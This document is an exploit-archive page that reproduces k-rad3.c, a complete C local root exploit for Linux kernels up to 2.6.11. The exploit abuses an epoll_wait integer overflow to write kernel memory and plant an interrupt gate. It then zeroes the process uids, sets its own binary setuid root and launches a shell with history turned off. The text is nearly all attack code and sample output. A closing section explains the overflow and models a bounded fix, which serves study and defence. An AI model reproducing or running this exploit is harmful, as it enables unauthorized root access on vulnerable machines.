Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)

06 Jul 2008 00:00:00, reported by RootType
Source: seebug (www.seebug.org)

Linux Kernel <= 2.6.11 Local Root Exploit

Code

/*
 * k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3
 * Discovered and original exploit coded Jan 2005 by sd <[email protected]>
 *
 *********************************************************************
 *
 * Modified 2005/9 by alert7 <[email protected]>
 * XFOCUS Security Team http://www.xfocus.org
 *
 * gcc -o k-rad3 k-rad3.c -static -O2
 *
 * tested successfully:
 *        on default installed RHEL4 (2.6.9-5.EL and 2.6.9-5.ELsmp)
 *             2.6.9-5.EL    ./k-rad3 -p 2
 *             2.6.9-5.ELsmp ./k-rad3 -a -p 7
 *        on default installed Magic Linux 1.2
 *             MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2
 *
 * thanks to watercloud for testing on Magic Linux 1.2
 * thanks to eist for providing RHEL4 to test on
 * thanks to sd <[email protected]> for sharing his stuff.
 * thanks to xfocus & xfocus's friends
 *
 *
 * TODO:
 *         CASE 1: use stack > 0xc0000000
 *         CASE 2: CONFIG_X86_PAE defined, but cpu flag has no pse
 *
 *[alert7@MagicLinux ~]$ ./k-rad3 -h
 *[  k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit  ]
 *[ Discovered Jan 2005 by sd <[email protected]> ]
 *[ Modified 2005/9 by alert7 <[email protected]> ]
 *
 *Usage: ./k-rad3
 *       -s forced cpu flag pse
 *        -a define CONFIG_X86_PAE,default none
 *        -e <num> have two kernel code,default 0
 *        -p <num> alloc pages(4k) ,default 1. Increase from 1 to 7
 *                The higher number the more likely it will crash
 *        -t <num> default 0
 *                0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
 *
 *[alert7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2
 *[  k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit  ]
 *[ Discovered Jan 2005 by sd <[email protected]> ]
 *[ Modified 2005/9 by alert7 <[email protected]> ]
 *[+] try open /proc/cpuinfo .. ok!!
 *[+] find cpu flag pse in /proc/cpuinfo
 *[+] CONFIG_X86_PAE :none
 *[+] Cpu flag: pse ok
 *[+] Exploit Way : 0
 *[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n)
 *[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
 *[+] idtr.base 0xc0461000 ,base 0xc0000000
 *[+] kwrite base 0xc0000000, buf 0xbffed750,num 8196
 *[+] idt[0x7f] addr 0xffc003f8
 *[+] j00 1u(k7 k1d!
 *[root@k-rad3 ~] #id
 *uid=0(root) gid=0(root) groups=500(alert7)
 *
 *
 *  Linux Kernel <= 2.6.11 "sys_epoll_wait" Local integer overflow Exploit
 * 
 * "it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) 
 * memory due to integer overflow in sys_epoll_wait and misuse of
 * __put_user in ep_send_events"
 * Georgi Guninski: http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html
 *
 *********************************************************************
 *
 *
 * In memory of pwned.c (uselib)
 * 
 * - Redistributions of source code is not permitted.
 * - Redistributions in the binary form is not permitted.
 * - Redistributions of the above copyright notice, this list of conditions,
 * and the following disclaimer is permitted.
 * - By proceeding to a Redistribution and under any form of the Program
 * the Distributor is granting ownership of his Resources without
 * limitations to the copyright holder(s).
 *
 * 
 * Since we already owned everyone, there's no point keeping this private
 * anymore.
 *
 * http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html
 *
 * Thanks to our internet hero georgi guninski for being such an incredible
 * whitehat disclosing one of the most reliable kernel bugs.
 * You saved the world, man, we owe you one!
 *
 * This version is somewhat broken, but a skilled reader will get an idea.
 * Well, at least let the scriptkids have fun for a while.
 *
 * Thanks to all who helped me developing/testing this, you know who you are,
 * and especially to my gf for guidance while coding this.
 *
 */

#define _GNU_SOURCE

#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/epoll.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <linux/capability.h>
#include <asm/unistd.h>
#ifndef __USE_GNU
	#define __USE_GNU
#endif
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <alloca.h>

/**
  * Relationship Variables
  *
  * 1: CONFIG_X86_PAE
  *     see /lib/modules/`uname -r`/build/.config
  *     1.1: pse
  * 2: THREAD_SIZE
  *     see include/asm/thread_info.h THREAD_SIZE define
  */


#define MAP (0xfffff000 - (1023*4096))
#define MAP_PAE (0xfffff000 - (511*4096))
#define MKPTE(addr) ((addr & (~4095)) | 0x27)
#define MKPMD(x) (0x1e3|0x004)

////////////////////////////////////////////////

#define KRADPS1 "k-rad3"

/* unit suffixes: written as "4 kB", "2 MB", ... (postfix multiplication) */
#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB

#define KRS "\033[1;30m[ \033[1;37m"
#define KRE "\033[1;30m ]\033[0m"
#define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m "
#define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m "
#define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m "

/* fill an IDT descriptor: 32-bit interrupt gate (0x8E), DPL = ring */
#define SET_IDT_GATE(idt,ring,s,addr) \
	(idt).off1 = addr & 0xffff; \
	(idt).off2 = addr >> 16; \
	(idt).sel = s; \
	(idt).none = 0; \
	(idt).flags = 0x8E | (ring << 5);

//config val
static int havepse	= 0;
static int definePAE	= 0;
static int exploitway	= 0;
static int npages	= 1;
static int thread_size	= 0;


static uid_t uid	= 0;
static unsigned long long *clear1;
static char * progargv0;

struct idtr {
	unsigned short limit;
	unsigned int base;
} __attribute__ ((packed));

struct idt {
	unsigned short off1;
	unsigned short sel;
	unsigned char none,flags;
	unsigned short off2;
} __attribute__ ((packed));



#define __syscall_return(type, res) \
do { \
	if ((unsigned long)(res) >= (unsigned long)(-125)) { \
	errno = -(res); \
	res = -1; \
	} \
	return (type) (res); \
} while (0)


/* raw int 0x80 wrapper, so capget() does not go through libc */
#define _capget_macro(type,name,type1,arg1,type2,arg2) \
	type name(type1 arg1,type2 arg2) \
	{ \
	long __res; \
	__asm__ volatile ( "int $0x80" \
	: "=a" (__res) \
	: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
	__syscall_return(type,__res); \
	}

static inline _capget_macro(int,capget,void *,a,void *,b)

static int THREAD_SIZE_MASK =(-4096);


static void
fatal(const char *message)
{
	system("uname -a");
	printf("[-] %s\n",message);
	exit(1);
}

/* ring 0 payload (exploit way 0): walk the task_struct for the four
   uid fields matching our uid and zero uids and gids */
void kernel(unsigned * task)
{
	unsigned * addr = task;
	/* looking for uids */

	*clear1 = 0;

	while (addr[0] != uid || addr[1] != uid ||
		addr[2] != uid || addr[3] != uid
		)
		addr++;

	addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */
	addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */

}

void kcode(void);
void __kcode(void)
{
	asm(
	"kcode: \n"
	"cld \n"
	" pusha \n"
	" pushl %es \n"
	" pushl %ds \n"
	" movl %ss,%edx \n"
	" movl %edx,%es \n"
	" movl %edx,%ds \n");
	__asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) );
	asm(
	" andl %esp,%eax \n"
	" pushl (%eax) \n"
	" call kernel \n"
	" addl $4, %esp \n"
	" popl %ds \n"
	" popl %es \n"
	" popa \n"
	" cli \n"
	" iret \n"
	);
}


/* ring 0 payload (exploit way 1): locate the capability block in the
   thread structure and set all capability sets to full */
void raise_cap(unsigned long *ts)
{
/* must be on lower addresses because of kernel arg check :) */
static struct __user_cap_header_struct head;
static struct __user_cap_data_struct data;
static struct __user_cap_data_struct n;

int i;

*clear1 = 0;
head.version = 0x19980330;
head.pid = 0;
capget(&head, &data);
/* scan the thread_struct */
for (i = 0; i < 512; i++, ts++)
{
	/* is it capabilities block? */
	if (  (ts[0] == data.effective) &&
		(ts[1] == data.inheritable) &&
		(ts[2] == data.permitted))
	{
		/* set effective cap to some val */
		ts[0] = 0x12341234;
		capget(&head, &n);
		/* and test if it has changed */
		if (n.effective == ts[0])
		{
			/* if so, we're in :) */
			ts[0] = ts[1] = ts[2] = 0xffffffff;
			return;
		}
		/* otherwise fix back the stuff
		(if we've not crashed already :) */
		ts[0] = data.effective;
	}
}
return;
}


void stub(void);
void __stub(void)
{
	asm (
	"stub:;"
	" pusha;"
	);
	__asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) );
	asm(
	" and %esp, %eax;"
	" pushl (%eax);"
	" call raise_cap;"
	" pop %eax;"
	" popa;"
	" iret;"
	);

}


/* write to kernel from buf, num bytes */
static int
kwrite(unsigned base, char *buf, int num)
{
#define DIV 256
#define RES 4

int efd, c, i, fd;
int pi[2];
struct epoll_event ev;
int *stab;
unsigned long ptr;
int count;
/* maxevents chosen so that maxevents * sizeof(struct epoll_event)
   (12 bytes on i386) wraps around 32 bits */
unsigned magic = 0xffffffff / 12 + 1;

	printf("[+] kwrite base %p, buf %p,num %d\n", (void *)base,buf,num);
	/* initialize epoll */
	efd = epoll_create(4096);
	if (efd < 0)
		return -1;

	ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP;

	/* 12 bytes per fd + one more to be safely in stack space */
	count = (num+11)/12+RES;

	/* desc array: the fill loop below runs (count+DIV-1)/DIV + 1 times,
	   so size the array accordingly (the original allocated one int too few) */
	stab = alloca(((count+DIV-1)/DIV + 1)*sizeof(int));

	for (i = 0; i < ((count+DIV-1)/DIV)+1; i++)
	{

		if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0)
			return -1;

		send(pi[0], "a", 1, 0);
		stab[i] = pi[1];
	}

	/* highest fd and first descriptor */
	fd = pi[1];
	/* we've to allocate this separately because we need to have
	its fd preserved - using this we'll be writing actual bytes */
	epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev);
	//printf("EPOLL_CTL_ADD count %u\n",count);
	for (i = 0, c = 0; i < (count-1); i++)
	{
		int n;
		n = dup2(stab[i/DIV], fd+2+(i % DIV));
		if (n < 0)
			return -1;
		epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev);
		close(n);
	}

	/* in 'n' we've the latest fd we're using to write data */
	for (i = 0; i < ((num+7)/8); i++)
	{
		/* data being written from end */
		memcpy(&ev.data, buf + num - 8 - i * 8, 8);
		epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev);

		/* the actual kernel magic */
		ptr = (base + num - (i*8)) - (count * 12);
		struct epoll_event *events =(struct epoll_event *)ptr;
		//printf("epoll_wait verify_area(%p,%p) addr %p %p\n",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic);
		(void)events;
		int iret =epoll_wait(efd, (void *) ptr, magic, 31337);
		if (iret ==-1)
		{
			perror("epoll_wait");
			fatal("This kernel is not vulnerable!!!");

		}
		/* don't ask why (rotten rb-trees) :) */
		if (i)
		{
			//printf("epoll_wait verify_area(%p,%p) %p\n",ptr,magic* sizeof(struct epoll_event) ,magic);
			iret = epoll_wait(efd, (void *)ptr, magic, 31337);
			if (iret ==-1)
			{
				perror("epoll_wait");
				fatal("This kernel is not vulnerable!!!");

			}

		}
	}

	close(efd);
	for (i = 3; i <= fd; i++)
		close(i);

	return 0;

}

/* real-mode interrupt table fixup - point all interrupts to iret.
let's hope this will shut up apm */
static void
fixint(char *buf)
{
unsigned *tab = (void *) buf;
int i;

	for (i = 0; i < 256; i++)
		tab[i] = 0x0000400; /* 0000:0400h */
	/* iret */
	buf[0x400] =0xcf;
}

/* establish pte pointing to virtual addr 'addr' */
static int
map_pte(unsigned base, int pagenr, unsigned addr)
{
	unsigned *buf = alloca(pagenr * 4096 + 8);
	buf[(pagenr) * 1024] = MKPTE(addr);
	buf[(pagenr) * 1024+1] = 0;
	fixint((void *)buf);
	return kwrite(base, (void *)buf, pagenr * 4096 + 4);
}

/* make pme user can rw */
static int
map_pme(unsigned base, int pagenr, unsigned addr)
{
	unsigned *buf = alloca(pagenr * 4096 + 32);
	buf[(pagenr) * 1024] = MKPMD(addr);
	buf[(pagenr) * 1024+1] = 0;
	buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000;
	buf[(pagenr) * 1024+3] = 0;
	fixint((void *)buf);
	return kwrite(base, (void *)buf, pagenr * 4096 + 4*3);
}


/* SIGSEGV/SIGBUS handler */
static void
error(int sig)
{
	(void)sig;
	printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n");
	exit(1);
}

	char *bashargv[] = { KRADPS1, NULL };
	char *bashenvp[] = {	"TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BASH_HISTORY=/dev/null",
					"HISTORY=/dev/null", "history=/dev/null","HISTFILE=/dev/null",
					"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL };

static int
exploit(unsigned kernelbase, int npages)
{
	struct idt *idt;
	struct idtr idtr;



	signal(SIGSEGV, error);
	signal(SIGBUS, error);


	/* get idt descriptor addr */
	asm ("sidt %0" : "=m" (idtr));
	/*
	  * if OS in vmware , idtr.base is not right, please fix it
	  * [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table
	  * c0461000 D idt_table
	  * //idtr.base = 0xc0461000;
	  */

	printf("[+] idtr.base %p ,base %p\n",(void *)idtr.base , (void *)kernelbase);

	if ( !definePAE )
	{
		map_pte(kernelbase, npages, idtr.base - kernelbase);
		//	idt = pae?(void *)MAP_PAE:(void *)MAP;
		idt = (struct idt *)MAP;
	}else
	{
		/* TODO: pse disable case */
		if ( !havepse)
			printf("[!Warning!] TODO:CONFIG_X86_PAE defined, but cpu flag has no pse\n");

		map_pme(kernelbase, npages, idtr.base - kernelbase);
		idt = (struct idt *) idtr.base;
	}

#if 0
	int * p = (int *) idt;
	int i;
	for (i=0;i<1024;i++,p++)
		printf( "* %p 0x%x\n",p,*p);
	fflush(stdout);
#endif

	/**
	  * cleanup the stuff to prevent others spotting the gate
	  * - must be done from ring 0
	  */
	clear1 = (void *) &idt[0x7f];
	printf("[+] idt[0x7f] addr %p\n",clear1);

	if ( exploitway == 0)
	{
		SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode));
	}
	else
	{
		SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub));
	}

	//[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub));
	/**
	  * also can use [2] stub function, but it may cause this message
	  *
	  *	Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531
	  *	Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1
	  *	Sep 11 13:11:59 AD4 kernel:  [<c011ca30>] __might_sleep+0x7d/0x89
	  *	Sep 11 13:11:59 AD4 kernel:  [<c01270bd>] sys_capget+0x1d5/0x216
	  *	Sep 11 13:11:59 AD4 kernel:  [<c0301bfb>] syscall_call+0x7/0xb
	  *	Sep 11 13:11:59 AD4 kernel:  [<c017007b>] pipe_writev+0x24/0x320
	  *	Sep 11 13:11:59 AD4 kernel:  [<c01619a4>] filp_close+0x59/0x5f
	  *
	  */

	/* call raise_cap or kernel */
	asm ("int $0x7f");
	printf(KRADP "j00 1u(k7 k1d!\n");
	setresuid(0, 0, 0);
	setresgid(0, 0, 0);
	char cmdbuf[1024];
	snprintf(cmdbuf,1024,"chown root %s;chmod +s %s",progargv0,progargv0);
	system(cmdbuf);

	execve("/bin/sh", bashargv, bashenvp);
	exit(0);
}



static void
usage(char *n)
{

	printf("\nUsage: %s\n",n);
	printf("\t-s forced cpu flag pse \n");
	printf("\t-a define CONFIG_X86_PAE,default none\n");
	printf("\t-e <num> have two kernel code,default 0\n");
	printf("\t-p <num> alloc pages(4k) ,default 1. Increase from 1 to 7\n"
		 "\t\tThe higher number the more likely it will crash\n");
	printf("\t-t <num> default 0 \n"
		  "\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n");
	printf("\n");
	_exit(1);
}


/* read /proc/cpuinfo to set havepse */
static void
read_proc(void)
{
	FILE * fp;
	char * line = NULL;
	size_t len = 0;
	ssize_t read;
	printf("[+] try open /proc/cpuinfo ..");
	fp = fopen("/proc/cpuinfo", "r");
	if (fp == NULL)
	{
		printf(" failed!!\n");
		return;
	}
	printf(" ok!!\n");

	int pse = 0;
	while ((read = getline(&line, &len, fp)) != -1)
	{

		if (strstr(line,"flags"))
		{
			if(strstr(line ,"pse "))
			{
				pse ++;
			}
		}

	}
	fclose(fp);

	if (line)
		free(line);

	if ( pse )
	{
		printf("[+] find cpu flag pse in /proc/cpuinfo\n");
		havepse = 1;
	}

	return ;

}

static void
get_config(int ac, char **av)
{

	uid = getuid();
	progargv0 = av[0];

	int r;

	while(ac) {
		r = getopt(ac, av, "e:p:t:ash");

		if(r<0) break;

		switch(r) {

			case 's' :
			//pse
				havepse = 1;
				break;

			case 'a' :
			//define CONFIG_X86_PAE
				definePAE = 1;
				break;

			case 'e' :
				exploitway = atoi(optarg);
				if(exploitway<0) fatal("bad exploitway value");
				break;

			case 'p' :
				npages = atoi(optarg);
				break;
			case 't' :
				thread_size = atoi(optarg);

				break;

			case 'h' :
			default:
				usage(av[0]);
				break;
		}
	}

	THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192);

	read_proc();
}

static void
print_config(unsigned long kernelbase)
{
	printf("[+] CONFIG_X86_PAE :%s\n",	definePAE	?"ok":"none");
	printf("[+] Cpu flag: pse %s\n",		havepse		?"ok":"none");
	printf("[+] Exploit Way : %d\n",		exploitway);
	printf("[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\n",
			npages,kernelbase,kernelbase+npages*4 kB);
	printf("[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \n",thread_size);
	fflush(stdout);
}


/* if the binary is already setuid root (see exploit()), just spawn the shell */
void prepare(void)
{
	if (geteuid() == 0)
	{
		setresuid(0, 0, 0);
		setresgid(0, 0, 0);
		execve("/bin/sh", bashargv, bashenvp);
		fatal("[-] Unable to spawn shell");
	}
}

int
main(int argc, char **argv)
{
	char eater[65536];
	unsigned long kernelbase;

	/* unlink(argv[0]); */
	// sync();

	printf(KRS " "KRADPS1" - <=linux 2.6.11 CPL 0 kernel exploit " KRE "\n"
		KRS "Discovered Jan 2005 by sd <[email protected]>" KRE "\n"
		KRS "Modified 2005/9 by alert7 <[email protected]>" KRE "\n");

	if ( (unsigned long)eater > 0xc0000000)
	{
		printf("[!Warning!] TODO:use stack > 0xc0000000 \n");
		return 0;
	}

	prepare();

	get_config(argc,argv);

	/* round the stack address up to the next 256 MB boundary: the kernel
	   mapping starts there on a default 3G/1G split */
	kernelbase =(unsigned long)eater ;
	kernelbase +=0x0fffffff;
	kernelbase &=0xf0000000;

	print_config(kernelbase);

	exploit(kernelbase, npages<0?-npages:npages);

	return 0;

}
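The header comment quotes Guninski's description of the bug: an integer overflow in sys_epoll_wait's length computation, which is what kwrite() drives with its maxevents value of 0xffffffff / 12 + 1. The following is an added example, not part of k-rad3.c and not kernel source: a user-space model of that 32-bit length computation, showing why a check that only rejects maxevents <= 0 accepts a product that has wrapped to 8 bytes, and how bounding maxevents itself, as current kernels do with EP_MAX_EVENTS = INT_MAX / sizeof(struct epoll_event) in fs/eventpoll.c, rejects the same value before any multiplication happens. EPOLL_EVENT_SIZE, area_len_32, product_wrapped, vulnerable_check_passes, hardened_check_passes and MAX_EVENTS are names chosen here; the 12-byte event size is the i386 layout the exploit's kwrite() relies on as well.

```c
/* Added example, not from k-rad3.c or the kernel: models the maxevents
 * length check of a 32-bit sys_epoll_wait before and after bounding
 * maxevents. All identifiers below are chosen for this illustration. */
#include <stdint.h>
#include <stdbool.h>
#include <limits.h>
#include <stdio.h>

/* sizeof(struct epoll_event) on i386 (packed: 4 + 8 bytes) */
#define EPOLL_EVENT_SIZE 12u

/* What a 32-bit kernel computes as the length of the user buffer:
 * maxevents * sizeof(struct epoll_event), truncated to 32 bits. */
static uint32_t area_len_32(uint32_t maxevents)
{
	return maxevents * EPOLL_EVENT_SIZE;   /* unsigned 32-bit arithmetic wraps */
}

/* True when the 32-bit product differs from the mathematically correct one. */
static bool product_wrapped(uint32_t maxevents)
{
	return (uint64_t)maxevents * EPOLL_EVENT_SIZE != area_len_32(maxevents);
}

/* Pre-fix style check: only non-positive counts are rejected, and the
 * (possibly wrapped) length is what the access check then sees. */
static bool vulnerable_check_passes(int32_t maxevents, uint32_t *len_checked)
{
	if (maxevents <= 0)
		return false;
	*len_checked = area_len_32((uint32_t)maxevents);
	return true;
}

/* Hardened check: bound the count so the product can never exceed INT_MAX,
 * the same bound current kernels enforce via EP_MAX_EVENTS. */
#define MAX_EVENTS ((int32_t)(INT_MAX / EPOLL_EVENT_SIZE))

static bool hardened_check_passes(int32_t maxevents, uint32_t *len_checked)
{
	if (maxevents <= 0 || maxevents > MAX_EVENTS)
		return false;
	*len_checked = area_len_32((uint32_t)maxevents);   /* cannot wrap now */
	return true;
}

int main(void)
{
	/* the count kwrite() passes to epoll_wait: 0xffffffff / 12 + 1 */
	uint32_t magic = 0xffffffffu / 12 + 1;
	uint32_t len = 0;

	printf("maxevents            = %u\n", magic);
	printf("32-bit buffer length = %u (wrapped: %s)\n",
	       area_len_32(magic), product_wrapped(magic) ? "yes" : "no");
	printf("pre-fix check        : %s (length checked: %u)\n",
	       vulnerable_check_passes((int32_t)magic, &len) ? "passes" : "rejects", len);
	printf("bounded check        : %s (MAX_EVENTS = %d)\n",
	       hardened_check_passes((int32_t)magic, &len) ? "passes" : "rejects",
	       MAX_EVENTS);
	return 0;
}
```

The point of the bounded check is that it reasons about the count, not the product: once maxevents is capped at INT_MAX / sizeof(struct epoll_event), the multiplication that feeds the user-buffer access check is provably within range, so no later caller can rely on a wrapped length.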
Vulners AI Score: 7.1 (High risk)